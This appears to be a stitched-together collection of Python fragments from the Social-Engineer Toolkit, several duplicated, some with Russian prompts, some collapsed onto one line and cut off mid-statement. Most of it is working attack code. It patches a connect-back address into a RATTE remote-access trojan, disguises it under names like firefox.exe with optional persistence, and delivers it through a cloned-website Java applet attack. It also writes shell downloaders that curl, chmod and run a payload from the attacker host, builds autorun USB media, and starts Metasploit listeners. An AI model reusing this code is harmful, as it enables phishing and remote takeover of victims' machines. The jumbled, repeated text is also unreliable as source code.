def prepare_ratte(ipaddr, ratteport, persistent, customexe): core.print_info("preparing RATTE...") # replace ipaddress with one that we need for reverse connection back ############ # Load content of RATTE ############ with open("src/payloads/ratte/ratte.binary", "rb") as fileopen: data = fileopen.read() ############ # PATCH Server IP into RATTE ############ with open(os.path.join(core.userconfigpath, "ratteM.exe"), "wb") as filewrite: host = (len(ipaddr) + 1) * "X" r_port = (len(str(ratteport)) + 1) * "Y" pers = (len(str(persistent)) + 1) * "Z" # check ob cexe > 0, sonst wird ein Feld gepatcht (falsch!) if customexe: cexe = (len(str(customexe)) + 1) * "Q" else: cexe = "" filewrite.write( data.replace(cexe, customexe + "\x00", 1).replace(pers, persistent + "\x00", 1).replace( host, ipaddr + "\x00", 1).replace(r_port, str(ratteport) + "\x00", 1))
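def update_config():
    """Rebuild ``config/set_config.py`` from the ``config/set_config`` text file.

    Every non-comment ``NAME=VALUE`` line is copied into the generated
    module.  ``ON``/``OFF`` become ``True``/``False``; settings for which
    ``value_type()`` is truthy are written as double-quoted strings, all
    others verbatim.  The module is then imported and its ``CONFIG_DATE`` is
    compared with the timestamp just written.

    Changes from the previous version:
      * both files are closed even when a line fails to convert;
      * lines without ``=`` (blank lines included) are skipped instead of
        raising IndexError;
      * only the first ``=`` separates name and value, so values that
        contain ``=`` are no longer truncated;
      * backslashes and double quotes in quoted values are escaped, so a
        value cannot terminate its string literal in the generated module.

    NOTE(review): unquoted values are still emitted verbatim into a module
    that is imported below, so ``set_config`` must be writable only by the
    account that runs SET.
    NOTE(review): if ``set_config`` was already imported in this process the
    import below may return the cached module and report the old timestamp.
    """
    source_path = "%s/config/set_config" % (definepath)
    target_path = "%s/config/set_config.py" % (definepath)
    timestamp = str(datetime.datetime.now())
    banner = """#!/usr/bin/python\n
#######################################################################
##                    DO NOT MODIFY THIS FILE                        ##
#######################################################################
#  This file is generated by a routine inside SET, for use by SET.    #
#                                                                     #
#  Settings should be modified in the set_config file, and then       #
#  SET updated using the 'Update SET Configuration' menu item in      #
#  the main menu. This file will be updated with the new settings.    #
#                                                                     #
#  set_config.py generated: """ + timestamp + """                #
#                                                                     #
#######################################################################
CONFIG_DATE='""" + timestamp + """'\n"""

    # The source is opened first, so a missing set_config fails before the
    # generated module is truncated.
    with open(source_path, "r") as init_file, open(target_path, "w") as new_config:
        new_config.write(banner)
        for line in init_file:
            if line.startswith("#"):
                continue
            setting, separator, value = line.rstrip().partition("=")
            if not separator:
                # blank line or a line without "=": nothing to convert
                continue
            if value == "ON":
                value = "True"
            elif value == "OFF":
                value = "False"

            if value_type(setting):
                # Escape so the value stays inside its string literal.
                escaped = value.replace("\\", "\\\\").replace('"', '\\"')
                new_config.write(setting + '="' + escaped + '"\n')
            else:
                new_config.write(setting + "=" + value + "\n")

    sleep(1)
    from set_config import CONFIG_DATE as verify
    print_info("New set_config.py file generated on: %s" % timestamp)
    print_info("Verifying configuration update...")
    if verify == timestamp:
        print_status("Update verified, config timestamp is: %s" % timestamp)
    else:
        print_error("Update failed? Timestamp on config file is: %s" % verify)
    print_status("SET is using the new config, no need to restart")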
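def update_config():
    """Rebuild ``/etc/setoolkit/set_config.py`` from ``/etc/setoolkit/set.config``.

    Every non-comment ``NAME=VALUE`` line is copied into the generated
    module.  ``ON``/``OFF`` become ``True``/``False``; settings for which
    ``value_type()`` is truthy are written as double-quoted strings, all
    others verbatim.  The module is then imported and its ``CONFIG_DATE`` is
    compared with the timestamp just written.

    Changes from the previous version:
      * both files are closed even when a line fails to convert;
      * the blanket ``except: pass`` is gone: lines without ``=`` are skipped
        explicitly and only a failing ``value_type()`` lookup is tolerated,
        so KeyboardInterrupt and write errors are no longer swallowed;
      * only the first ``=`` separates name and value;
      * backslashes and double quotes in quoted values are escaped, so a
        value cannot terminate its string literal in the generated module;
      * ``/etc/setoolkit`` is added to ``sys.path`` once, not on every call.

    NOTE(review): unquoted values are emitted verbatim into a module that is
    imported below, and ``/etc/setoolkit`` is placed on ``sys.path``; the
    directory and both files should be writable only by the account that
    runs SET.
    """
    config_dir = "/etc/setoolkit"
    if not os.path.isdir(config_dir):
        os.makedirs(config_dir)

    timestamp = str(datetime.datetime.now())
    banner = """#!/usr/bin/python\n
#######################################################################
##                    DO NOT MODIFY THIS FILE                        ##
#######################################################################
#  This file is generated by a routine inside SET, for use by SET.    #
#                                                                     #
#  Settings should be modified in the set.config file, and then       #
#  SET updated using the 'Update SET Configuration' menu item in      #
#  the main menu. This file will be updated with the new settings.    #
#                                                                     #
#  set.config.py generated: """ + timestamp + """                #
#                                                                     #
#######################################################################
CONFIG_DATE='""" + timestamp + """'\n"""

    # The source is opened first, so a missing set.config fails before the
    # generated module is truncated.
    with open("/etc/setoolkit/set.config", "r") as init_file, \
            open("/etc/setoolkit/set_config.py", "w") as new_config:
        new_config.write(banner)
        for line in init_file:
            if line.startswith("#"):
                continue
            setting, separator, value = line.rstrip().partition("=")
            if not separator:
                # blank line or a line without "=": nothing to convert
                continue
            if value == "ON":
                value = "True"
            elif value == "OFF":
                value = "False"

            try:
                quoted = value_type(setting)
            except Exception:
                # Keep the original best-effort behaviour for settings the
                # lookup cannot classify: skip the line.
                continue

            if quoted:
                # Escape so the value stays inside its string literal.
                escaped = value.replace("\\", "\\\\").replace('"', '\\"')
                new_config.write(setting + '="' + escaped + '"\n')
            else:
                new_config.write(setting + '=' + value + '\n')

    sleep(1)
    if config_dir not in sys.path:
        sys.path.append(config_dir)
    from set_config import CONFIG_DATE as verify
    print_info("New set.config.py file generated on: %s" % timestamp)
    print_info("Verifying configuration update...")
    if verify == timestamp:
        print_status("Update verified, config timestamp is: %s" % timestamp)
    else:
        print_error("Update failed? Timestamp on config file is: %s" % verify)
    print_status("SET is using the new config, no need to restart")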
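def start_web_server_tw(directory, port):
    """Serve *directory* over HTTP from a background thread.

    The server binds to 0.0.0.0 (every interface) on *port* and is stored in
    the module-level ``httpd`` so that other code can stop it.
    ``SimpleHTTPRequestHandler`` serves the process's current working
    directory, which is why the function changes into *directory*.

    Change from the previous version: the working directory is switched
    before the serving thread starts.  Previously the thread was started
    first, so a request arriving in that window was answered from whatever
    directory the process happened to be in.

    Args:
        directory: path to serve; becomes the process working directory.
        port: TCP port to listen on.
    """
    global httpd
    server = None
    try:
        # import the threading, socketserver, and simplehttpserver
        import thread, SocketServer, SimpleHTTPServer

        # allow_reuse_address lets us rebind the port if an earlier server
        # instance is still hanging around
        class ReusableTCPServer(SocketServer.TCPServer):
            allow_reuse_address = True

        # bind on 0.0.0.0 (all interfaces) on the requested port
        server = ReusableTCPServer(("0.0.0.0", port), SimpleHTTPServer.SimpleHTTPRequestHandler)
        httpd = server
        try:
            # switch to the output path before any request can be handled
            os.chdir(directory)
        except OSError:
            # do not leave a bound socket behind when the path is unusable
            server.server_close()
            raise
        # serve from a background thread
        thread.start_new_thread(server.serve_forever, ())

    # handle keyboard interrupts
    except KeyboardInterrupt:
        core.print_info("Exiting the SET web server...")
        # the interrupt may arrive before the server object exists
        if server is not None:
            server.socket.close()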
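def start_web_server_tw(directory, port):
    """Serve *directory* over HTTP from a background thread.

    The server binds to 0.0.0.0 (every interface) on *port* and is stored in
    the module-level ``httpd`` so that other code can stop it.
    ``SimpleHTTPRequestHandler`` serves the process's current working
    directory, which is why the function changes into *directory*.

    Change from the previous version: the working directory is switched
    before the serving thread starts.  Previously the thread was started
    first, so a request arriving in that window was answered from whatever
    directory the process happened to be in.

    Args:
        directory: path to serve; becomes the process working directory.
        port: TCP port to listen on.
    """
    global httpd
    server = None
    try:
        # allow_reuse_address lets us rebind the port if an earlier server
        # instance is still hanging around
        class ReusableTCPServer(SocketServer.TCPServer):
            allow_reuse_address = True

        # bind on 0.0.0.0 (all interfaces) on the requested port
        server = ReusableTCPServer(("0.0.0.0", port), SimpleHTTPServer.SimpleHTTPRequestHandler)
        httpd = server
        try:
            # switch to the output path before any request can be handled
            os.chdir(directory)
        except OSError:
            # do not leave a bound socket behind when the path is unusable
            server.server_close()
            raise
        # serve from a background thread
        thread.start_new_thread(server.serve_forever, ())

    # handle keyboard interrupts
    except KeyboardInterrupt:
        core.print_info("Выход из веб-сервера SET...")
        # the interrupt may arrive before the server object exists
        if server is not None:
            server.socket.close()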
def prepare_ratte(ipaddr, ratteport, persistent, customexe): core.print_info("preparing RATTE...") # replace ipaddress with one that we need for reverse connection back ############ # Load content of RATTE ############ with open("src/payloads/ratte/ratte.binary", "rb") as fileopen: data = fileopen.read() ############ # PATCH Server IP into RATTE ############ with open(os.path.join(core.setdir + "ratteM.exe"), "wb") as filewrite: host = (len(ipaddr) + 1) * "X" r_port = (len(str(ratteport)) + 1) * "Y" pers = (len(str(persistent)) + 1) * "Z" # check ob cexe > 0, sonst wird ein Feld gepatcht (falsch!) if customexe: cexe = (len(str(customexe)) + 1) * "Q" else: cexe = "" filewrite.write(data.replace(cexe, customexe + "\x00", 1).replace(pers, persistent + "\x00", 1).replace(host, ipaddr + "\x00", 1).replace(r_port, str(ratteport) + "\x00", 1))
print(core.bcolors.RED + """Since the exploit picked requires port 80 for WebDav, the\nSET HTTP Server port has been changed to 8080. You will need\nto coax someone to your IP Address on 8080, for example\nyou need it to be http://172.16.32.50:8080 instead of standard\nhttp (80) traffic.""") web_server_start() # if we are using ettercap if os.path.isfile(os.path.join(core.setdir, "ettercap")): with open(os.path.join(core.setdir, "ettercap")) as fileopen5: for line in fileopen5: ettercap = line.rstrip() # run in background ettercap += " &" # spawn ettercap or dsniff subprocess.Popen(ettercap, shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE) # if metasploit config is in directory if os.path.isfile(os.path.join(core.setdir, "meta_config")): core.print_info("Launching MSF Listener...") core.print_info("This may take a few to load MSF...") # this checks to see if we want to start a listener automatic_listener = core.check_config("AUTOMATIC_LISTENER=").lower() if automatic_listener != "off": # specify if we are using the multi pyinjector meta_config = "meta_config" if os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")): meta_config = "meta_config_multipyinjector" # if we arent using a custom payload if custom != 1: child1 = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(msf_path, "msfconsole"), os.path.join(core.setdir, meta_config))) # check if we want to deliver emails or track users that click the # link webattack_email = core.check_config("WEBATTACK_EMAIL=").lower() if webattack_email == "on" or track_email == "on":
# core upx pass #setcore.upx("src/program_junk/msf.exe") if os.path.isfile("src/program_junk/web_clone/msf.exe"): os.remove("src/program_junk/web_clone/msf.exe") if os.path.isfile("src/program_junk/msf.exe"): shutil.copyfile("src/program_junk/msf.exe", "src/program_junk/web_clone/msf.exe") if payload_selection == "SETSHELL": if os.path.isfile("%s/src/program_junk/web_clone/x" %(definepath)): os.remove("%s/src/program_junk/web_clone/x" % (definepath)) shutil.copyfile("%s/src/payloads/set_payloads/shell.windows" % (definepath), "%s/src/program_junk/web_clone/x" % (definepath)) # if we are targetting nix if posix == True: setcore.print_info("Targetting of OSX/Linux (POSIX-based) as well. Prepping posix payload...") filewrite = file("%s/src/program_junk/web_clone/mac.bin" % (definepath), "w") payload_flags = webserver.split(" ") # grab osx binary name osx_name = setcore.generate_random_string(10,10) downloader = "#!/bin/sh\ncurl -C - -O http://%s/%s\nchmod +x %s\n./%s %s %s &" % (payload_flags[1],osx_name,osx_name,osx_name,payload_flags[1],payload_flags[2]) filewrite.write(downloader) filewrite.close() # grab nix binary name linux_name = setcore.generate_random_string(10,10) downloader = "#!/usr/bin/sh\ncurl -C - -O http://%s/%s\nchmod +x %s\n./%s %s %s &" % (payload_flags[1],linux_name,linux_name,linux_name,payload_flags[1],payload_flags[2]) filewrite = file("%s/src/program_junk/web_clone/nix.bin" % (definepath), "w") filewrite.write(downloader) filewrite.close() shutil.copyfile("src/payloads/set_payloads/shell.osx", "src/program_junk/web_clone/%s" % (osx_name)) shutil.copyfile("src/payloads/set_payloads/shell.linux", "src/program_junk/web_clone/%s" % (linux_name))
def main():
    """Collect the RATTE settings interactively and build the payload file.

    Prompts for the connect-back IP address (checked with
    ``core.validate_ip``; the function returns after the third invalid
    entry), the listener port (8080 when the input is not an integer), the
    persistence choice and an optional custom file name, then passes them to
    ``prepare_ratte()`` and prints the output path.

    The user-facing prompt strings in this copy are in Russian and are part
    of the program's behaviour.
    """
    valid_site = False
    valid_ip = False
    valid_response = False
    input_counter = 0

    #################
    # get User Input
    #################
    # Up to three attempts at a valid connect-back address.
    while valid_ip != True and input_counter < 3:
        ipaddr = input(
            core.setprompt(["9", "2"], "Введите IP-адрес для подключения"))
        valid_ip = core.validate_ip(ipaddr)
        if not valid_ip:
            if input_counter == 2:
                core.print_error(
                    "\nМожет быть, вы неправильно написали адрес?")
                sleep(4)
                return
            else:
                input_counter += 1

    # (An older, commented-out version of the port prompt was kept here.)

    # Port prompt: 0 and values above 65535 are re-prompted; negative
    # numbers are not rejected by this check.  Any non-integer input, on the
    # first prompt or a re-prompt, selects the default of 8080.
    try:
        ratteport = int(
            input(
                core.setprompt(
                    ["9", "2"],
                    "Порт RATTE Server должен прослушивать [8080]")))
        while ratteport == 0 or ratteport > 65535:
            if ratteport == 0:
                core.print_warning(text.PORT_NOT_ZERO)
            if ratteport > 65535:
                core.print_warning(text.PORT_TOO_HIGH)
            ratteport = int(
                input(
                    core.setprompt(
                        ["9", "2"],
                        "Введите порт RATTE Сервер должен прослушивать [8080]")
                ))
    except ValueError:
        # core.print_info("Port set to default of 8080")
        ratteport = 8080

    # (An older, commented-out version of the persistence prompt was kept here.)

    # Repeat until the answer is one of no/n/yes/y (case-insensitive); the
    # value handed on is normalised to "NO" or "YES".
    while not valid_response:
        persistent = input(
            core.setprompt(["9", "2"],
                           "Должен ли RATTE быть постоянным [no|yes]?"))
        persistent = str.lower(persistent)
        if persistent == "no" or persistent == "n":
            persistent = "NO"
            valid_response = True
        elif persistent == "yes" or persistent == "y":
            persistent = "YES"
            valid_response = True
        else:
            core.print_warning(text.YES_NO_RESPONSES)
            valid_response = False

    customexe = input(
        core.setprompt([
            "9", "2"
        ], "Используйте конкретное имя файла (например, firefox.exe) [filename.exe или пусто]?"
        ))

    ############
    # prepare RATTE
    ############
    prepare_ratte(ipaddr, ratteport, persistent, customexe)

    core.print_status("Полезная нагрузка была экспортирована в %s" % os.path.join(core.userconfigpath, "ratteM.exe"))

    ###################
    # start ratteserver
    ###################
    # (An older, commented-out version of the listener prompt was kept here.)

    # NOTE(review): valid_response is already True when this loop is reached
    # (the persistence loop above only exits once it is set), and nothing
    # resets it in between.
    while not valid_response:
        prompt = input(
            core.setprompt(["9", "2"],
                           "Запустите слушатель ratteserver сейчас [yes|no]"))
        prompt = str.lower(prompt)
        if prompt == "no" or prompt == "n":
            # prompt = "NO"
            core.print_error("Aborting...")
            sleep(2)
            valid_response = True
        elif prompt == "yes" or prompt == "y":
            core.print_info("Старт ратсервер...")
            ratte_listener_start(ratteport)
            core.print_info("Остановка ратсервера...")
            sleep(2)
            valid_response = True
        else:
            core.print_warning(
                "действительные ответы 'n|y|N|Y|no|yes|No|Yes|NO|YES'")
elif trigger == 3: payload = "openthis.wab" else: payload = "" filewrite.write( """[autorun]\nopen={0}\nicon=autorun.ico""".format(payload)) core.print_status( "Your attack has been created in the SET home directory (/root/.set/) folder 'autorun'" ) core.print_status( "Note a backup copy of template.pdf is also in /root/.set/template.pdf if needed." ) core.print_info("Copy the contents of the folder to a CD/DVD/USB to autorun") # if we want to launch payload and automatically create listener if trigger in [1, 2, 3]: choice1 = core.yesno_prompt("0", "Create a listener right now [yes|no]") if choice1.lower() == "yes" or choice1.lower() == "y": # if we used something to create other than solo.py then write out the # listener if not os.path.isfile(os.path.join(core.setdir, "meta_config")): with open(os.path.join(core.setdir, "meta_config"), 'w') as filewrite, \ open(os.path.join(core.setdir, "payload.options")) as fileopen: for line in fileopen: line = line.split(" ") filewrite.write("use multi/handler\n") filewrite.write("set payload {0}\n".format(line[0])) filewrite.write("set lhost {0}\n".format(line[1]))
def main():
    """Collect the RATTE settings interactively and build the payload file.

    Prompts for the connect-back IP address (checked with
    ``core.validate_ip``; the function returns after the third invalid
    entry), the listener port (8080 when the input is not an integer), the
    persistence choice and an optional custom file name, then passes them to
    ``prepare_ratte()`` and prints the output path.
    """
    valid_site = False
    valid_ip = False
    valid_response = False
    input_counter = 0

    #################
    # get User Input
    #################
    # Up to three attempts at a valid connect-back address.
    while valid_ip != True and input_counter < 3:
        ipaddr = input(core.setprompt(["9", "2"], "Enter the IP address to connect back on"))
        valid_ip = core.validate_ip(ipaddr)
        if not valid_ip:
            if input_counter == 2:
                core.print_error("\nMaybe you have the address written down wrong?")
                sleep(4)
                return
            else:
                input_counter += 1

    # (An older, commented-out version of the port prompt was kept here.)

    # Port prompt: 0 and values above 65535 are re-prompted; negative
    # numbers are not rejected by this check.  Any non-integer input, on the
    # first prompt or a re-prompt, selects the default of 8080.
    try:
        ratteport = int(input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")))
        while ratteport == 0 or ratteport > 65535:
            if ratteport == 0:
                core.print_warning(text.PORT_NOT_ZERO)
            if ratteport > 65535:
                core.print_warning(text.PORT_TOO_HIGH)
            ratteport = int(input(core.setprompt(["9", "2"], "Enter port RATTE Server should listen on [8080]")))
    except ValueError:
        # core.print_info("Port set to default of 8080")
        ratteport = 8080

    # (An older, commented-out version of the persistence prompt was kept here.)

    # Repeat until the answer is one of no/n/yes/y (case-insensitive); the
    # value handed on is normalised to "NO" or "YES".
    while not valid_response:
        persistent = input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
        persistent = str.lower(persistent)
        if persistent == "no" or persistent == "n":
            persistent = "NO"
            valid_response = True
        elif persistent == "yes" or persistent == "y":
            persistent = "YES"
            valid_response = True
        else:
            core.print_warning(text.YES_NO_RESPONSES)
            valid_response = False

    customexe = input(core.setprompt(["9", "2"], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))

    ############
    # prepare RATTE
    ############
    prepare_ratte(ipaddr, ratteport, persistent, customexe)

    # NOTE(review): os.path.join() receives one concatenated string, so no
    # separator is inserted between core.setdir and the file name.
    core.print_status("Payload has been exported to %s" % os.path.join(core.setdir + "ratteM.exe"))

    ###################
    # start ratteserver
    ###################
    # (An older, commented-out version of the listener prompt was kept here.)

    # NOTE(review): valid_response is already True when this loop is reached
    # (the persistence loop above only exits once it is set), and nothing
    # resets it in between.
    while not valid_response:
        prompt = input(core.setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]"))
        prompt = str.lower(prompt)
        if prompt == "no" or prompt == "n":
            # prompt = "NO"
            core.print_error("Aborting...")
            sleep(2)
            valid_response = True
        elif prompt == "yes" or prompt == "y":
            core.print_info("Starting ratteserver...")
            ratte_listener_start(ratteport)
            core.print_info("Stopping ratteserver...")
            sleep(2)
            valid_response = True
        else:
            core.print_warning("valid responses are 'n|y|N|Y|no|yes|No|Yes|NO|YES'")
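if prompt == "yes" or prompt == "y":
    # prompt the user to import the code signing certificate
    cert_path = input(core.setprompt("0", "Path to the code signing certificate file (provided by CA)"))
    # keep asking until the path names an existing file
    while not os.path.isfile(cert_path):
        core.print_error("ERROR:Filename not found. Try again.")
        cert_path = input(core.setprompt("0", "Path to the .cer certificate file"))

    # here is where we import the certificate
    try:
        core.print_info("Importing the certificate into SET...")
        # The path is typed in by the user, so it is passed to keytool as a
        # single argv element instead of being formatted into a shell command
        # line: spaces, quotes and shell metacharacters in the file name are
        # then plain characters, not syntax.
        subprocess.Popen(["keytool", "-import", "-alias", "MyCert", "-file", cert_path]).wait()
        # trigger that we have our certificate already and bypass the
        # request process below
        # NOTE(review): keytool's exit status is not checked, so the flag is
        # set even when the import was refused (for example because the
        # alias already exists).
        use_flag = 1

    except OSError:
        # keytool itself could not be started; use_flag is left as it was,
        # presumably initialised before this fragment - confirm.
        core.print_error("ERROR:keytool could not be started.")

# this will exit the menu
if prompt == "quit" or prompt == "q":
    use_flag = 0
    prompt = "yes"
    cert_path = ""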
def main():
    """Collect the RATTE settings interactively and build the payload file.

    Prompts for the connect-back IP address (checked with
    ``core.validate_ip``; the function returns after the third invalid
    entry), the listener port (8080 when the input is not an integer), the
    persistence choice and an optional custom file name, then passes them to
    ``prepare_ratte()`` and prints the output path.
    """
    valid_site = False
    valid_ip = False
    valid_response = False
    input_counter = 0

    #################
    # get User Input
    #################
    # Up to three attempts at a valid connect-back address.
    while valid_ip != True and input_counter < 3:
        ipaddr = input(
            core.setprompt(["9", "2"],
                           "Enter the IP address to connect back on"))
        valid_ip = core.validate_ip(ipaddr)
        if not valid_ip:
            if input_counter == 2:
                core.print_error(
                    "\nMaybe you have the address written down wrong?")
                sleep(4)
                return
            else:
                input_counter += 1

    # (An older, commented-out version of the port prompt was kept here.)

    # Port prompt: 0 and values above 65535 are re-prompted; negative
    # numbers are not rejected by this check.  Any non-integer input, on the
    # first prompt or a re-prompt, selects the default of 8080.
    try:
        ratteport = int(
            input(
                core.setprompt(["9", "2"],
                               "Port RATTE Server should listen on [8080]")))
        while ratteport == 0 or ratteport > 65535:
            if ratteport == 0:
                core.print_warning(text.PORT_NOT_ZERO)
            if ratteport > 65535:
                core.print_warning(text.PORT_TOO_HIGH)
            ratteport = int(
                input(
                    core.setprompt(
                        ["9", "2"],
                        "Enter port RATTE Server should listen on [8080]")))
    except ValueError:
        # core.print_info("Port set to default of 8080")
        ratteport = 8080

    # (An older, commented-out version of the persistence prompt was kept here.)

    # Repeat until the answer is one of no/n/yes/y (case-insensitive); the
    # value handed on is normalised to "NO" or "YES".
    while not valid_response:
        persistent = input(
            core.setprompt(["9", "2"],
                           "Should RATTE be persistent [no|yes]?"))
        persistent = str.lower(persistent)
        if persistent == "no" or persistent == "n":
            persistent = "NO"
            valid_response = True
        elif persistent == "yes" or persistent == "y":
            persistent = "YES"
            valid_response = True
        else:
            core.print_warning(text.YES_NO_RESPONSES)
            valid_response = False

    customexe = input(
        core.setprompt([
            "9", "2"
        ], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))

    ############
    # prepare RATTE
    ############
    prepare_ratte(ipaddr, ratteport, persistent, customexe)

    core.print_status("Payload has been exported to %s" % os.path.join(core.userconfigpath, "ratteM.exe"))

    ###################
    # start ratteserver
    ###################
    # (An older, commented-out version of the listener prompt was kept here.)

    # NOTE(review): valid_response is already True when this loop is reached
    # (the persistence loop above only exits once it is set), and nothing
    # resets it in between.
    while not valid_response:
        prompt = input(
            core.setprompt(["9", "2"],
                           "Start the ratteserver listener now [yes|no]"))
        prompt = str.lower(prompt)
        if prompt == "no" or prompt == "n":
            # prompt = "NO"
            core.print_error("Aborting...")
            sleep(2)
            valid_response = True
        elif prompt == "yes" or prompt == "y":
            core.print_info("Starting ratteserver...")
            ratte_listener_start(ratteport)
            core.print_info("Stopping ratteserver...")
            sleep(2)
            valid_response = True
        else:
            core.print_warning(
                "valid responses are 'n|y|N|Y|no|yes|No|Yes|NO|YES'")
def main(): valid_site = False valid_ip = False # valid_persistence = False input_counter = 0 site_input_counter = 0 ipaddr = None website = None # pause=input("This module has finished completing. Press <enter> to continue") # Get a *VALID* website address while not valid_site and site_input_counter < 3: website = input(core.setprompt(["9", "2"], "Enter website to clone (ex. https://gmail.com)")) site = urlparse(website) if site.scheme == "http" or site.scheme == "https": if site.netloc != "": valid_site = True else: if site_input_counter == 2: core.print_error("\nМожет быть, вы неправильно записали адрес?" + core.bcolors.ENDC) sleep(4) return else: core.print_warning("Я не могу определить fqdn или IP сайта. Попробуй снова?") site_input_counter += 1 else: if site_input_counter == 2: core.print_error("\nМожет быть, вы неправильно записали адрес?") sleep(4) return else: core.print_warning("Я не мог определить, является ли это http или https сайтом. Попробуй снова?") site_input_counter += 1 # core.DebugInfo("site.scheme is: %s " % site.scheme) # core.DebugInfo("site.netloc is: %s " % site.netloc) # core.DebugInfo("site.path is: %s " % site.path) # core.DebugInfo("site.params are: %s " % site.params) # core.DebugInfo("site.query is: %s " % site.query) # core.DebugInfo("site.fragment is: %s " % site.fragment) while not valid_ip and input_counter < 3: ipaddr = input(core.setprompt(["9", "2"], "Введите IP-адрес для подключения")) valid_ip = core.validate_ip(ipaddr) if not valid_ip: if input_counter == 2: core.print_error("\nМожет быть, вы неправильно записали адрес?") sleep(4) return else: input_counter += 1 # javaport must be 80, cause applet uses in web injection port 80 to download payload! 
try: javaport = int(input(core.setprompt(["9", "2"], "Апплет порта Java должен слушать [80]"))) while javaport == 0 or javaport > 65535: if javaport == 0: core.print_warning(text.PORT_NOT_ZERO) if javaport > 65535: core.print_warning(text.PORT_TOO_HIGH) javaport = int(input(core.setprompt(["9", "2"], "Апплет порта Java должен слушать [80]"))) except ValueError: # core.print_info("Port set to default of 80") javaport = 80 try: ratteport = int(input(core.setprompt(["9", "2"], "Сервер RATTE порта должен слушать [8080]"))) while ratteport == javaport or ratteport == 0 or ratteport > 65535: if ratteport == javaport: core.print_warning("Порт не должен быть равен javaport!") if ratteport == 0: core.print_warning(text.PORT_NOT_ZERO) if ratteport > 65535: core.print_warning(text.PORT_TOO_HIGH) ratteport = int(input(core.setprompt(["9", "2"], "Сервер RATTE порта должен слушать [8080]"))) except ValueError: ratteport = 8080 persistent = core.yesno_prompt(["9", "2"], "Должен ли RATTE быть постоянным [no|yes]?") # j0fer 06-27-2012 # while valid_persistence != True: # j0fer 06-27-2012 # persistent=input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?")) # j0fer 06-27-2012 # persistent=str.lower(persistent) # j0fer 06-27-2012 # if persistent == "no" or persistent == "n": # j0fer 06-27-2012 # persistent="NO" # j0fer 06-27-2012 # valid_persistence = True # j0fer 06-27-2012 # elif persistent == "yes" or persistent == "y": # j0fer 06-27-2012 # persistent="YES" # j0fer 06-27-2012 # valid_persistence = True # j0fer 06-27-2012 # else: # j0fer 06-27-2012 # core.print_warning(text.YES_NO_RESPONSES) customexe = input(core.setprompt(["9", "2"], "Используйте конкретное имя файла (например, firefox.exe) [filename.exe или пусто]? 
")) ####################################### # prepare RATTE ####################################### prepare_ratte(ipaddr, ratteport, persistent, customexe) ###################################### # Java Applet Attack to deploy RATTE ####################################### core.print_info("Запуск атаки Java-апплета..") java_applet_attack_tw(website, javaport, "reports/", ipaddr) with open(os.path.join(userconfigpath, definepath, "/rand_gen")) as fileopen: for line in fileopen: ratte_random = line.rstrip() subprocess.Popen("cp %s/ratteM.exe %s/reports/%s" % (os.path.join(userconfigpath, definepath), definepath, ratte_random), shell=True).wait() ####################### # start ratteserver ####################### core.print_info("Стартовый ратсервер...") ratte_listener_start(ratteport) ###################### # stop webserver ###################### stop_web_server_tw() return
def prep_website():
    """Report that this feature is disabled, then call ``return_continue()``."""
    notice = "This feature is currently under development and disabled."
    print_info(notice)
    return_continue()
os.remove("src/program_junk/web_clone/msf.exe") if os.path.isfile("src/program_junk/msf.exe"): shutil.copyfile("src/program_junk/msf.exe", "src/program_junk/web_clone/msf.exe") if payload_selection == "SETSHELL": if os.path.isfile("%s/src/program_junk/web_clone/x" % (definepath)): os.remove("%s/src/program_junk/web_clone/x" % (definepath)) shutil.copyfile( "%s/src/payloads/set_payloads/shell.windows" % (definepath), "%s/src/program_junk/web_clone/x" % (definepath)) # if we are targetting nix if posix == True: setcore.print_info( "Targetting of OSX/Linux (POSIX-based) as well. Prepping posix payload..." ) filewrite = file("%s/src/program_junk/web_clone/mac.bin" % (definepath), "w") payload_flags = webserver.split(" ") # grab osx binary name osx_name = setcore.generate_random_string(10, 10) downloader = "#!/bin/sh\ncurl -C - -O http://%s/%s\nchmod +x %s\n./%s %s %s &" % ( payload_flags[1], osx_name, osx_name, osx_name, payload_flags[1], payload_flags[2]) filewrite.write(downloader) filewrite.close() # grab nix binary name linux_name = setcore.generate_random_string(10, 10) downloader = "#!/usr/bin/sh\ncurl -C - -O http://%s/%s\nchmod +x %s\n./%s %s %s &" % ( payload_flags[1], linux_name, linux_name, linux_name, payload_flags[1],
# if we are using ettercap if os.path.isfile(os.path.join(core.setdir, "ettercap")): with open(os.path.join(core.setdir, "ettercap")) as fileopen5: for line in fileopen5: ettercap = line.rstrip() # run in background ettercap += " &" # spawn ettercap or dsniff subprocess.Popen(ettercap, shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE) # if metasploit config is in directory if os.path.isfile(os.path.join(core.setdir, "meta_config")): core.print_info("Launching MSF Listener...") core.print_info("This may take a few to load MSF...") # this checks to see if we want to start a listener automatic_listener = core.check_config("AUTOMATIC_LISTENER=").lower() if automatic_listener != "off": # specify if we are using the multi pyinjector meta_config = "meta_config" if os.path.isfile( os.path.join(core.setdir, "meta_config_multipyinjector")): meta_config = "meta_config_multipyinjector" # if we arent using a custom payload if custom != 1: child1 = pexpect.spawn("{0} -r {1}\r\n\r\n".format( os.path.join(msf_path, "msfconsole"), os.path.join(core.setdir, meta_config))) # check if we want to deliver emails or track users that click the
